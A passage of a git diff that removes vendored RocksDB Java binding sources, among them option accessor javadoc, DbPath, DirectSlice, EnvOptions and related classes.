-   *
-   * Default: 1 Mb
-   *
-   * Special value: 0 - means do not maintain per instance buffer. Allocate
-   *                per request buffer and avoid locking.
-   *
-   * @return the maximum size of the random access buffer
-   */
-  long randomAccessMaxBufferSize();
-
-  /**
-   * This is the maximum buffer size that is used by WritableFileWriter.
-   * On Windows, we need to maintain an aligned buffer for writes.
-   * We allow the buffer to grow until it's size hits the limit.
-   *
-   * Default: 1024 * 1024 (1 MB)
-   *
-   * @param writableFileMaxBufferSize the maximum buffer size
-   *
-   * @return the reference to the current options.
-   */
-  T setWritableFileMaxBufferSize(long writableFileMaxBufferSize);
-
-  /**
-   * This is the maximum buffer size that is used by WritableFileWriter.
-   * On Windows, we need to maintain an aligned buffer for writes.
-   * We allow the buffer to grow until it's size hits the limit.
-   *
-   * Default: 1024 * 1024 (1 MB)
-   *
-   * @return the maximum buffer size
-   */
-  long writableFileMaxBufferSize();
-
-  /**
-   * Use adaptive mutex, which spins in the user space before resorting
-   * to kernel. This could reduce context switch when the mutex is not
-   * heavily contended. However, if the mutex is hot, we could end up
-   * wasting spin time.
-   * Default: false
-   *
-   * @param useAdaptiveMutex true if adaptive mutex is used.
-   * @return the instance of the current object.
-   */
-  T setUseAdaptiveMutex(boolean useAdaptiveMutex);
-
-  /**
-   * Use adaptive mutex, which spins in the user space before resorting
-   * to kernel. This could reduce context switch when the mutex is not
-   * heavily contended. However, if the mutex is hot, we could end up
-   * wasting spin time.
-   * Default: false
-   *
-   * @return true if adaptive mutex is used.
-   */
-  boolean useAdaptiveMutex();
-
-  /**
-   * Allows OS to incrementally sync files to disk while they are being
-   * written, asynchronously, in the background.
-   * Issue one request for every bytes_per_sync written. 0 turns it off.
-   * Default: 0
-   *
-   * @param bytesPerSync size in bytes
-   * @return the instance of the current object.
-   */
-  T setBytesPerSync(long bytesPerSync);
-
-  /**
-   * Allows OS to incrementally sync files to disk while they are being
-   * written, asynchronously, in the background.
-   * Issue one request for every bytes_per_sync written. 0 turns it off.
-   * Default: 0
-   *
-   * @return size in bytes
-   */
-  long bytesPerSync();
-
-  /**
-   * Same as {@link #setBytesPerSync(long)} , but applies to WAL files
-   *
-   * Default: 0, turned off
-   *
-   * @param walBytesPerSync size in bytes
-   * @return the instance of the current object.
-   */
-  T setWalBytesPerSync(long walBytesPerSync);
-
-  /**
-   * Same as {@link #bytesPerSync()} , but applies to WAL files
-   *
-   * Default: 0, turned off
-   *
-   * @return size in bytes
-   */
-  long walBytesPerSync();
-
-  /**
-   * If true, then the status of the threads involved in this DB will
-   * be tracked and available via GetThreadList() API.
-   *
-   * Default: false
-   *
-   * @param enableThreadTracking true to enable tracking
-   *
-   * @return the reference to the current options.
-   */
-  T setEnableThreadTracking(boolean enableThreadTracking);
-
-  /**
-   * If true, then the status of the threads involved in this DB will
-   * be tracked and available via GetThreadList() API.
-   *
-   * Default: false
-   *
-   * @return true if tracking is enabled
-   */
-  boolean enableThreadTracking();
-
-  /**
-   * The limited write rate to DB if
-   * {@link ColumnFamilyOptions#softPendingCompactionBytesLimit()} or
-   * {@link ColumnFamilyOptions#level0SlowdownWritesTrigger()} is triggered,
-   * or we are writing to the last mem table allowed and we allow more than 3
-   * mem tables. It is calculated using size of user write requests before
-   * compression. RocksDB may decide to slow down more if the compaction still
-   * gets behind further.
-   *
-   * Unit: bytes per second.
-   *
-   * Default: 16MB/s
-   *
-   * @param delayedWriteRate the rate in bytes per second
-   *
-   * @return the reference to the current options.
-   */
-  T setDelayedWriteRate(long delayedWriteRate);
-
-  /**
-   * The limited write rate to DB if
-   * {@link ColumnFamilyOptions#softPendingCompactionBytesLimit()} or
-   * {@link ColumnFamilyOptions#level0SlowdownWritesTrigger()} is triggered,
-   * or we are writing to the last mem table allowed and we allow more than 3
-   * mem tables. It is calculated using size of user write requests before
-   * compression. RocksDB may decide to slow down more if the compaction still
-   * gets behind further.
-   *
-   * Unit: bytes per second.
-   *
-   * Default: 16MB/s
-   *
-   * @return the rate in bytes per second
-   */
-  long delayedWriteRate();
-
-  /**
-   * If true, allow multi-writers to update mem tables in parallel.
-   * Only some memtable factorys support concurrent writes; currently it
-   * is implemented only for SkipListFactory.  Concurrent memtable writes
-   * are not compatible with inplace_update_support or filter_deletes.
-   * It is strongly recommended to set
-   * {@link #setEnableWriteThreadAdaptiveYield(boolean)} if you are going to use
-   * this feature.
-   * Default: false
-   *
-   * @param allowConcurrentMemtableWrite true to enable concurrent writes
-   *     for the memtable
-   *
-   * @return the reference to the current options.
-   */
-  T setAllowConcurrentMemtableWrite(boolean allowConcurrentMemtableWrite);
-
-  /**
-   * If true, allow multi-writers to update mem tables in parallel.
-   * Only some memtable factorys support concurrent writes; currently it
-   * is implemented only for SkipListFactory.  Concurrent memtable writes
-   * are not compatible with inplace_update_support or filter_deletes.
-   * It is strongly recommended to set
-   * {@link #setEnableWriteThreadAdaptiveYield(boolean)} if you are going to use
-   * this feature.
-   * Default: false
-   *
-   * @return true if concurrent writes are enabled for the memtable
-   */
-  boolean allowConcurrentMemtableWrite();
-
-  /**
-   * If true, threads synchronizing with the write batch group leader will
-   * wait for up to {@link #writeThreadMaxYieldUsec()} before blocking on a
-   * mutex. This can substantially improve throughput for concurrent workloads,
-   * regardless of whether {@link #allowConcurrentMemtableWrite()} is enabled.
-   * Default: false
-   *
-   * @param enableWriteThreadAdaptiveYield true to enable adaptive yield for the
-   *     write threads
-   *
-   * @return the reference to the current options.
-   */
-  T setEnableWriteThreadAdaptiveYield(
-      boolean enableWriteThreadAdaptiveYield);
-
-  /**
-   * If true, threads synchronizing with the write batch group leader will
-   * wait for up to {@link #writeThreadMaxYieldUsec()} before blocking on a
-   * mutex. This can substantially improve throughput for concurrent workloads,
-   * regardless of whether {@link #allowConcurrentMemtableWrite()} is enabled.
-   * Default: false
-   *
-   * @return true if adaptive yield is enabled
-   *    for the writing threads
-   */
-  boolean enableWriteThreadAdaptiveYield();
-
-  /**
-   * The maximum number of microseconds that a write operation will use
-   * a yielding spin loop to coordinate with other write threads before
-   * blocking on a mutex.  (Assuming {@link #writeThreadSlowYieldUsec()} is
-   * set properly) increasing this value is likely to increase RocksDB
-   * throughput at the expense of increased CPU usage.
-   * Default: 100
-   *
-   * @param writeThreadMaxYieldUsec maximum number of microseconds
-   *
-   * @return the reference to the current options.
-   */
-  T setWriteThreadMaxYieldUsec(long writeThreadMaxYieldUsec);
-
-  /**
-   * The maximum number of microseconds that a write operation will use
-   * a yielding spin loop to coordinate with other write threads before
-   * blocking on a mutex.  (Assuming {@link #writeThreadSlowYieldUsec()} is
-   * set properly) increasing this value is likely to increase RocksDB
-   * throughput at the expense of increased CPU usage.
-   * Default: 100
-   *
-   * @return the maximum number of microseconds
-   */
-  long writeThreadMaxYieldUsec();
-
-  /**
-   * The latency in microseconds after which a std::this_thread::yield
-   * call (sched_yield on Linux) is considered to be a signal that
-   * other processes or threads would like to use the current core.
-   * Increasing this makes writer threads more likely to take CPU
-   * by spinning, which will show up as an increase in the number of
-   * involuntary context switches.
-   * Default: 3
-   *
-   * @param writeThreadSlowYieldUsec the latency in microseconds
-   *
-   * @return the reference to the current options.
-   */
-  T setWriteThreadSlowYieldUsec(long writeThreadSlowYieldUsec);
-
-  /**
-   * The latency in microseconds after which a std::this_thread::yield
-   * call (sched_yield on Linux) is considered to be a signal that
-   * other processes or threads would like to use the current core.
-   * Increasing this makes writer threads more likely to take CPU
-   * by spinning, which will show up as an increase in the number of
-   * involuntary context switches.
-   * Default: 3
-   *
-   * @return writeThreadSlowYieldUsec the latency in microseconds
-   */
-  long writeThreadSlowYieldUsec();
-
-  /**
-   * If true, then DB::Open() will not update the statistics used to optimize
-   * compaction decision by loading table properties from many files.
-   * Turning off this feature will improve DBOpen time especially in
-   * disk environment.
-   *
-   * Default: false
-   *
-   * @param skipStatsUpdateOnDbOpen true if updating stats will be skipped
-   *
-   * @return the reference to the current options.
-   */
-  T setSkipStatsUpdateOnDbOpen(boolean skipStatsUpdateOnDbOpen);
-
-  /**
-   * If true, then DB::Open() will not update the statistics used to optimize
-   * compaction decision by loading table properties from many files.
-   * Turning off this feature will improve DBOpen time especially in
-   * disk environment.
-   *
-   * Default: false
-   *
-   * @return true if updating stats will be skipped
-   */
-  boolean skipStatsUpdateOnDbOpen();
-
-  /**
-   * Recovery mode to control the consistency while replaying WAL
-   *
-   * Default: {@link WALRecoveryMode#PointInTimeRecovery}
-   *
-   * @param walRecoveryMode The WAL recover mode
-   *
-   * @return the reference to the current options.
-   */
-  T setWalRecoveryMode(WALRecoveryMode walRecoveryMode);
-
-  /**
-   * Recovery mode to control the consistency while replaying WAL
-   *
-   * Default: {@link WALRecoveryMode#PointInTimeRecovery}
-   *
-   * @return The WAL recover mode
-   */
-  WALRecoveryMode walRecoveryMode();
-
-  /**
-   * if set to false then recovery will fail when a prepared
-   * transaction is encountered in the WAL
-   *
-   * Default: false
-   *
-   * @param allow2pc true if two-phase-commit is enabled
-   *
-   * @return the reference to the current options.
-   */
-  T setAllow2pc(boolean allow2pc);
-
-  /**
-   * if set to false then recovery will fail when a prepared
-   * transaction is encountered in the WAL
-   *
-   * Default: false
-   *
-   * @return true if two-phase-commit is enabled
-   */
-  boolean allow2pc();
-
-  /**
-   * A global cache for table-level rows.
-   *
-   * Default: null (disabled)
-   *
-   * @param rowCache The global row cache
-   *
-   * @return the reference to the current options.
-   */
-  T setRowCache(final Cache rowCache);
-
-  /**
-   * A global cache for table-level rows.
-   *
-   * Default: null (disabled)
-   *
-   * @return The global row cache
-   */
-  Cache rowCache();
-
-  /**
-   * If true, then DB::Open / CreateColumnFamily / DropColumnFamily
-   * / SetOptions will fail if options file is not detected or properly
-   * persisted.
-   *
-   * DEFAULT: false
-   *
-   * @param failIfOptionsFileError true if we should fail if there is an error
-   *     in the options file
-   *
-   * @return the reference to the current options.
-   */
-  T setFailIfOptionsFileError(boolean failIfOptionsFileError);
-
-  /**
-   * If true, then DB::Open / CreateColumnFamily / DropColumnFamily
-   * / SetOptions will fail if options file is not detected or properly
-   * persisted.
-   *
-   * DEFAULT: false
-   *
-   * @return true if we should fail if there is an error in the options file
-   */
-  boolean failIfOptionsFileError();
-
-  /**
-   * If true, then print malloc stats together with rocksdb.stats
-   * when printing to LOG.
-   *
-   * DEFAULT: false
-   *
-   * @param dumpMallocStats true if malloc stats should be printed to LOG
-   *
-   * @return the reference to the current options.
-   */
-  T setDumpMallocStats(boolean dumpMallocStats);
-
-  /**
-   * If true, then print malloc stats together with rocksdb.stats
-   * when printing to LOG.
-   *
-   * DEFAULT: false
-   *
-   * @return true if malloc stats should be printed to LOG
-   */
-  boolean dumpMallocStats();
-
-  /**
-   * By default RocksDB replay WAL logs and flush them on DB open, which may
-   * create very small SST files. If this option is enabled, RocksDB will try
-   * to avoid (but not guarantee not to) flush during recovery. Also, existing
-   * WAL logs will be kept, so that if crash happened before flush, we still
-   * have logs to recover from.
-   *
-   * DEFAULT: false
-   *
-   * @param avoidFlushDuringRecovery true to try to avoid (but not guarantee
-   *     not to) flush during recovery
-   *
-   * @return the reference to the current options.
-   */
-  T setAvoidFlushDuringRecovery(boolean avoidFlushDuringRecovery);
-
-  /**
-   * By default RocksDB replay WAL logs and flush them on DB open, which may
-   * create very small SST files. If this option is enabled, RocksDB will try
-   * to avoid (but not guarantee not to) flush during recovery. Also, existing
-   * WAL logs will be kept, so that if crash happened before flush, we still
-   * have logs to recover from.
-   *
-   * DEFAULT: false
-   *
-   * @return true to try to avoid (but not guarantee not to) flush during
-   *     recovery
-   */
-  boolean avoidFlushDuringRecovery();
-
-  /**
-   * By default RocksDB will flush all memtables on DB close if there are
-   * unpersisted data (i.e. with WAL disabled) The flush can be skip to speedup
-   * DB close. Unpersisted data WILL BE LOST.
-   *
-   * DEFAULT: false
-   *
-   * Dynamically changeable through
-   *     {@link RocksDB#setOptions(ColumnFamilyHandle, MutableColumnFamilyOptions)}
-   *     API.
-   *
-   * @param avoidFlushDuringShutdown true if we should avoid flush during
-   *     shutdown
-   *
-   * @return the reference to the current options.
-   */
-  T setAvoidFlushDuringShutdown(boolean avoidFlushDuringShutdown);
-
-  /**
-   * By default RocksDB will flush all memtables on DB close if there are
-   * unpersisted data (i.e. with WAL disabled) The flush can be skip to speedup
-   * DB close. Unpersisted data WILL BE LOST.
-   *
-   * DEFAULT: false
-   *
-   * Dynamically changeable through
-   *     {@link RocksDB#setOptions(ColumnFamilyHandle, MutableColumnFamilyOptions)}
-   *     API.
-   *
-   * @return true if we should avoid flush during shutdown
-   */
-  boolean avoidFlushDuringShutdown();
-}
diff --git a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/DbPath.java b/thirdparty/rocksdb/java/src/main/java/org/rocksdb/DbPath.java
deleted file mode 100644
index 3f0b675..0000000
--- a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/DbPath.java
+++ /dev/null
@@ -1,47 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-package org.rocksdb;
-
-import java.nio.file.Path;
-
-/**
- * Tuple of database path and target size
- */
-public class DbPath {
-  final Path path;
-  final long targetSize;
-
-  public DbPath(final Path path, final long targetSize) {
-    this.path = path;
-    this.targetSize = targetSize;
-  }
-
-  @Override
-  public boolean equals(final Object o) {
-    if (this == o) {
-      return true;
-    }
-
-    if (o == null || getClass() != o.getClass()) {
-      return false;
-    }
-
-    final DbPath dbPath = (DbPath) o;
-
-    if (targetSize != dbPath.targetSize) {
-      return false;
-    }
-
-    return path != null ? path.equals(dbPath.path) : dbPath.path == null;
-  }
-
-  @Override
-  public int hashCode() {
-    int result = path != null ? path.hashCode() : 0;
-    result = 31 * result + (int) (targetSize ^ (targetSize >>> 32));
-    return result;
-  }
-}
diff --git a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/DirectComparator.java b/thirdparty/rocksdb/java/src/main/java/org/rocksdb/DirectComparator.java
deleted file mode 100644
index 4c37dfd..0000000
--- a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/DirectComparator.java
+++ /dev/null
@@ -1,33 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-package org.rocksdb;
-
-/**
- * Base class for comparators which will receive
- * ByteBuffer based access via org.rocksdb.DirectSlice
- * in their compare method implementation.
- *
- * ByteBuffer based slices perform better when large keys
- * are involved. When using smaller keys consider
- * using @see org.rocksdb.Comparator
- */
-public abstract class DirectComparator extends AbstractComparator<DirectSlice> {
-
-  private final long nativeHandle_;
-
-  public DirectComparator(final ComparatorOptions copt) {
-    super();
-    this.nativeHandle_ = createNewDirectComparator0(copt.nativeHandle_);
-  }
-
-  @Override
-  protected final long getNativeHandle() {
-    return nativeHandle_;
-  }
-
-  private native long createNewDirectComparator0(
-      final long comparatorOptionsHandle);
-}
diff --git a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/DirectSlice.java b/thirdparty/rocksdb/java/src/main/java/org/rocksdb/DirectSlice.java
deleted file mode 100644
index b0d35c3..0000000
--- a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/DirectSlice.java
+++ /dev/null
@@ -1,132 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-package org.rocksdb;
-
-import java.nio.ByteBuffer;
-
-/**
- * Base class for slices which will receive direct
- * ByteBuffer based access to the underlying data.
- *
- * ByteBuffer backed slices typically perform better with
- * larger keys and values. When using smaller keys and
- * values consider using @see org.rocksdb.Slice
- */
-public class DirectSlice extends AbstractSlice<ByteBuffer> {
-  public final static DirectSlice NONE = new DirectSlice();
-
-  /**
-   * Indicates whether we have to free the memory pointed to by the Slice
-   */
-  private final boolean internalBuffer;
-  private volatile boolean cleared = false;
-  private volatile long internalBufferOffset = 0;
-
-  /**
-   * Called from JNI to construct a new Java DirectSlice
-   * without an underlying C++ object set
-   * at creation time.
-   *
-   * Note: You should be aware that it is intentionally marked as
-   * package-private. This is so that developers cannot construct their own
-   * default DirectSlice objects (at present). As developers cannot construct
-   * their own DirectSlice objects through this, they are not creating
-   * underlying C++ DirectSlice objects, and so there is nothing to free
-   * (dispose) from Java.
-   */
-  DirectSlice() {
-    super();
-    this.internalBuffer = false;
-  }
-
-  /**
-   * Constructs a slice
-   * where the data is taken from
-   * a String.
-   *
-   * @param str The string
-   */
-  public DirectSlice(final String str) {
-    super(createNewSliceFromString(str));
-    this.internalBuffer = true;
-  }
-
-  /**
-   * Constructs a slice where the data is
-   * read from the provided
-   * ByteBuffer up to a certain length
-   *
-   * @param data The buffer containing the data
-   * @param length The length of the data to use for the slice
-   */
-  public DirectSlice(final ByteBuffer data, final int length) {
-    super(createNewDirectSlice0(ensureDirect(data), length));
-    this.internalBuffer = false;
-  }
-
-  /**
-   * Constructs a slice where the data is
-   * read from the provided
-   * ByteBuffer
-   *
-   * @param data The bugger containing the data
-   */
-  public DirectSlice(final ByteBuffer data) {
-    super(createNewDirectSlice1(ensureDirect(data)));
-    this.internalBuffer = false;
-  }
-
-  private static ByteBuffer ensureDirect(final ByteBuffer data) {
-    if(!data.isDirect()) {
-      throw new IllegalArgumentException("The ByteBuffer must be direct");
-    }
-    return data;
-  }
-
-  /**
-   * Retrieves the byte at a specific offset
-   * from the underlying data
-   *
-   * @param offset The (zero-based) offset of the byte to retrieve
-   *
-   * @return the requested byte
-   */
-  public byte get(final int offset) {
-    return get0(getNativeHandle(), offset);
-  }
-
-  @Override
-  public void clear() {
-    clear0(getNativeHandle(), !cleared && internalBuffer, internalBufferOffset);
-    cleared = true;
-  }
-
-  @Override
-  public void removePrefix(final int n) {
-    removePrefix0(getNativeHandle(), n);
-    this.internalBufferOffset += n;
-  }
-
-  @Override
-  protected void disposeInternal() {
-    final long nativeHandle = getNativeHandle();
-    if(!cleared && internalBuffer) {
-      disposeInternalBuf(nativeHandle, internalBufferOffset);
-    }
-    disposeInternal(nativeHandle);
-  }
-
-  private native static long createNewDirectSlice0(final ByteBuffer data,
-      final int length);
-  private native static long createNewDirectSlice1(final ByteBuffer data);
-  @Override protected final native ByteBuffer data0(long handle);
-  private native byte get0(long handle, int offset);
-  private native void clear0(long handle, boolean internalBuffer,
-      long internalBufferOffset);
-  private native void removePrefix0(long handle, int length);
-  private native void disposeInternalBuf(final long handle,
-      long internalBufferOffset);
-}
diff --git a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/EncodingType.java b/thirdparty/rocksdb/java/src/main/java/org/rocksdb/EncodingType.java
deleted file mode 100644
index 5ceeb54..0000000
--- a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/EncodingType.java
+++ /dev/null
@@ -1,55 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-package org.rocksdb;
-
-/**
- * EncodingType
- *
- * <p>The value will determine how to encode keys
- * when writing to a new SST file.</p>
- *
- * <p>This value will be stored
- * inside the SST file which will be used when reading from
- * the file, which makes it possible for users to choose
- * different encoding type when reopening a DB. Files with
- * different encoding types can co-exist in the same DB and
- * can be read.</p>
- */
-public enum EncodingType {
-  /**
-   * Always write full keys without any special encoding.
-   */
-  kPlain((byte) 0),
-  /**
-   * <p>Find opportunity to write the same prefix once for multiple rows.
-   * In some cases, when a key follows a previous key with the same prefix,
-   * instead of writing out the full key, it just writes out the size of the
-   * shared prefix, as well as other bytes, to save some bytes.</p>
-   *
-   * <p>When using this option, the user is required to use the same prefix
-   * extractor to make sure the same prefix will be extracted from the same key.
-   * The Name() value of the prefix extractor will be stored in the file. When
-   * reopening the file, the name of the options.prefix_extractor given will be
-   * bitwise compared to the prefix extractors stored in the file. An error
-   * will be returned if the two don't match.</p>
-   */
-  kPrefix((byte) 1);
-
-  /**
-   * Returns the byte value of the enumerations value
-   *
-   * @return byte representation
-   */
-  public byte getValue() {
-    return value_;
-  }
-
-  private EncodingType(byte value) {
-    value_ = value;
-  }
-
-  private final byte value_;
-}
diff --git a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/Env.java b/thirdparty/rocksdb/java/src/main/java/org/rocksdb/Env.java
deleted file mode 100644
index a46f061..0000000
--- a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/Env.java
+++ /dev/null
@@ -1,92 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-package org.rocksdb;
-
-/**
- * Base class for all Env implementations in RocksDB.
- */
-public abstract class Env extends RocksObject {
-  public static final int FLUSH_POOL = 0;
-  public static final int COMPACTION_POOL = 1;
-
-  /**
-   * <p>Returns the default environment suitable for the current operating
-   * system.</p>
-   *
-   * <p>The result of {@code getDefault()} is a singleton whose ownership
-   * belongs to rocksdb c++.  As a result, the returned RocksEnv will not
-   * have the ownership of its c++ resource, and calling its dispose()
-   * will be no-op.</p>
-   *
-   * @return the default {@link org.rocksdb.RocksEnv} instance.
-   */
-  public static Env getDefault() {
-    return default_env_;
-  }
-
-  /**
-   * <p>Sets the number of background worker threads of the flush pool
-   * for this environment.</p>
-   * <p>Default number: 1</p>
-   *
-   * @param num the number of threads
-   *
-   * @return current {@link RocksEnv} instance.
-   */
-  public Env setBackgroundThreads(final int num) {
-    return setBackgroundThreads(num, FLUSH_POOL);
-  }
-
-  /**
-   * <p>Sets the number of background worker threads of the specified thread
-   * pool for this environment.</p>
-   *
-   * @param num the number of threads
-   * @param poolID the id to specified a thread pool.  Should be either
-   *     FLUSH_POOL or COMPACTION_POOL.
-   *
-   * <p>Default number: 1</p>
-   * @return current {@link RocksEnv} instance.
-   */
-  public Env setBackgroundThreads(final int num, final int poolID) {
-    setBackgroundThreads(nativeHandle_, num, poolID);
-    return this;
-  }
-
-  /**
-   * <p>Returns the length of the queue associated with the specified
-   * thread pool.</p>
-   *
-   * @param poolID the id to specified a thread pool.  Should be either
-   *     FLUSH_POOL or COMPACTION_POOL.
-   *
-   * @return the thread pool queue length.
-   */
-  public int getThreadPoolQueueLen(final int poolID) {
-    return getThreadPoolQueueLen(nativeHandle_, poolID);
-  }
-
-
-  protected Env(final long nativeHandle) {
-    super(nativeHandle);
-  }
-
-  static {
-    default_env_ = new RocksEnv(getDefaultEnvInternal());
-  }
-
-  /**
-   * <p>The static default Env. The ownership of its native handle
-   * belongs to rocksdb c++ and is not able to be released on the Java
-   * side.</p>
-   */
-  static Env default_env_;
-
-  private static native long getDefaultEnvInternal();
-  private native void setBackgroundThreads(
-      long handle, int num, int priority);
-  private native int getThreadPoolQueueLen(long handle, int poolID);
-}
diff --git a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/EnvOptions.java b/thirdparty/rocksdb/java/src/main/java/org/rocksdb/EnvOptions.java
deleted file mode 100644
index 2bca035..0000000
--- a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/EnvOptions.java
+++ /dev/null
@@ -1,207 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-package org.rocksdb;
-
-public class EnvOptions extends RocksObject {
-  static {
-    RocksDB.loadLibrary();
-  }
-
-  public EnvOptions() {
-    super(newEnvOptions());
-  }
-
-  public EnvOptions setUseOsBuffer(final boolean useOsBuffer) {
-    setUseOsBuffer(nativeHandle_, useOsBuffer);
-    return this;
-  }
-
-  public boolean useOsBuffer() {
-    assert(isOwningHandle());
-    return useOsBuffer(nativeHandle_);
-  }
-
-  public EnvOptions setUseMmapReads(final boolean useMmapReads) {
-    setUseMmapReads(nativeHandle_, useMmapReads);
-    return this;
-  }
-
-  public boolean useMmapReads() {
-    assert(isOwningHandle());
-    return useMmapReads(nativeHandle_);
-  }
-
-  public EnvOptions setUseMmapWrites(final boolean useMmapWrites) {
-    setUseMmapWrites(nativeHandle_, useMmapWrites);
-    return this;
-  }
-
-  public boolean useMmapWrites() {
-    assert(isOwningHandle());
-    return useMmapWrites(nativeHandle_);
-  }
-
-  public EnvOptions setUseDirectReads(final boolean useDirectReads) {
-    setUseDirectReads(nativeHandle_, useDirectReads);
-    return this;
-  }
-
-  public boolean useDirectReads() {
-    assert(isOwningHandle());
-    return useDirectReads(nativeHandle_);
-  }
-
-  public EnvOptions setUseDirectWrites(final boolean useDirectWrites) {
-    setUseDirectWrites(nativeHandle_, useDirectWrites);
-    return this;
-  }
-
-  public boolean useDirectWrites() {
-    assert(isOwningHandle());
-    return useDirectWrites(nativeHandle_);
-  }
-
-  public EnvOptions setAllowFallocate(final boolean allowFallocate) {
-    setAllowFallocate(nativeHandle_, allowFallocate);
-    return this;
-  }
-
-  public boolean allowFallocate() {
-    assert(isOwningHandle());
-    return allowFallocate(nativeHandle_);
-  }
-
-  public EnvOptions setSetFdCloexec(final boolean setFdCloexec) {
-    setSetFdCloexec(nativeHandle_, setFdCloexec);
-    return this;
-  }
-
-  public boolean setFdCloexec() {
-    assert(isOwningHandle());
-    return setFdCloexec(nativeHandle_);
-  }
-
-  public EnvOptions setBytesPerSync(final long bytesPerSync) {
-    setBytesPerSync(nativeHandle_, bytesPerSync);
-    return this;
-  }
-
-  public long bytesPerSync() {
-    assert(isOwningHandle());
-    return bytesPerSync(nativeHandle_);
-  }
-
-  public EnvOptions setFallocateWithKeepSize(final boolean fallocateWithKeepSize) {
-    setFallocateWithKeepSize(nativeHandle_, fallocateWithKeepSize);
-    return this;
-  }
-
-  public boolean fallocateWithKeepSize() {
-    assert(isOwningHandle());
-    return fallocateWithKeepSize(nativeHandle_);
-  }
-
-  public EnvOptions setCompactionReadaheadSize(final long compactionReadaheadSize) {
-    setCompactionReadaheadSize(nativeHandle_, compactionReadaheadSize);
-    return this;
-  }
-
-  public long compactionReadaheadSize() {
-    assert(isOwningHandle());
-    return compactionReadaheadSize(nativeHandle_);
-  }
-
-  public EnvOptions setRandomAccessMaxBufferSize(final long randomAccessMaxBufferSize) {
-    setRandomAccessMaxBufferSize(nativeHandle_, randomAccessMaxBufferSize);
-    return this;
-  }
-
-  public long randomAccessMaxBufferSize() {
-    assert(isOwningHandle());
-    return randomAccessMaxBufferSize(nativeHandle_);
-  }
-
-  public EnvOptions setWritableFileMaxBufferSize(final long writableFileMaxBufferSize) {
-    setWritableFileMaxBufferSize(nativeHandle_, writableFileMaxBufferSize);
-    return this;
-  }
-
-  public long writableFileMaxBufferSize() {
-    assert(isOwningHandle());
-    return writableFileMaxBufferSize(nativeHandle_);
-  }
-
-  public EnvOptions setRateLimiter(final RateLimiter rateLimiter) {
-    this.rateLimiter = rateLimiter;
-    setRateLimiter(nativeHandle_, rateLimiter.nativeHandle_);
-    return this;
-  }
-
-  public RateLimiter rateLimiter() {
-    assert(isOwningHandle());
-    return rateLimiter;
-  }
-
-  private native static long newEnvOptions();
-
-  @Override protected final native void disposeInternal(final long handle);
-
-  private native void setUseOsBuffer(final long handle, final boolean useOsBuffer);
-
-  private native boolean useOsBuffer(final long handle);
-
-  private native void setUseMmapReads(final long handle, final boolean useMmapReads);
-
-  private native boolean useMmapReads(final long handle);
-
-  private native void setUseMmapWrites(final long handle, final boolean useMmapWrites);
-
-  private native boolean useMmapWrites(final long handle);
-
-  private native void setUseDirectReads(final long handle, final boolean useDirectReads);
-
-  private native boolean useDirectReads(final long handle);
-
-  private native void setUseDirectWrites(final long handle, final boolean useDirectWrites);
-
-  private native boolean useDirectWrites(final long handle);
-
-  private native void setAllowFallocate(final long handle, final boolean allowFallocate);
-
-  private native boolean allowFallocate(final long handle);
-
-  private native void setSetFdCloexec(final long handle, final boolean setFdCloexec);
-
-  private native boolean setFdCloexec(final long handle);
-
-  private native void setBytesPerSync(final long handle, final long bytesPerSync);
-
-  private native long bytesPerSync(final long handle);
-
-  private native void setFallocateWithKeepSize(
-      final long handle, final boolean fallocateWithKeepSize);
-
-  private native boolean fallocateWithKeepSize(final long handle);
-
-  private native void setCompactionReadaheadSize(
-      final long handle, final long compactionReadaheadSize);
-
-  private native long compactionReadaheadSize(final long handle);
-
-  private native void setRandomAccessMaxBufferSize(
-      final long handle, final long randomAccessMaxBufferSize);
-
-  private native long randomAccessMaxBufferSize(final long handle);
-
-  private native void setWritableFileMaxBufferSize(
-      final long handle, final long writableFileMaxBufferSize);
-
-  private native long writableFileMaxBufferSize(final long handle);
-
-  private native void setRateLimiter(final long handle, final long rateLimiterHandle);
-
-  private RateLimiter rateLimiter;
-}
diff --git a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/Experimental.java b/thirdparty/rocksdb/java/src/main/java/org/rocksdb/Experimental.java
deleted file mode 100644
index 64b404d..0000000
--- a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/Experimental.java
+++ /dev/null
@@ -1,23 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-package org.rocksdb;
-
-import java.lang.annotation.ElementType;
-import java.lang.annotation.Documented;
-import java.lang.annotation.Retention;
-import java.lang.annotation.RetentionPolicy;
-import java.lang.annotation.Target;
-
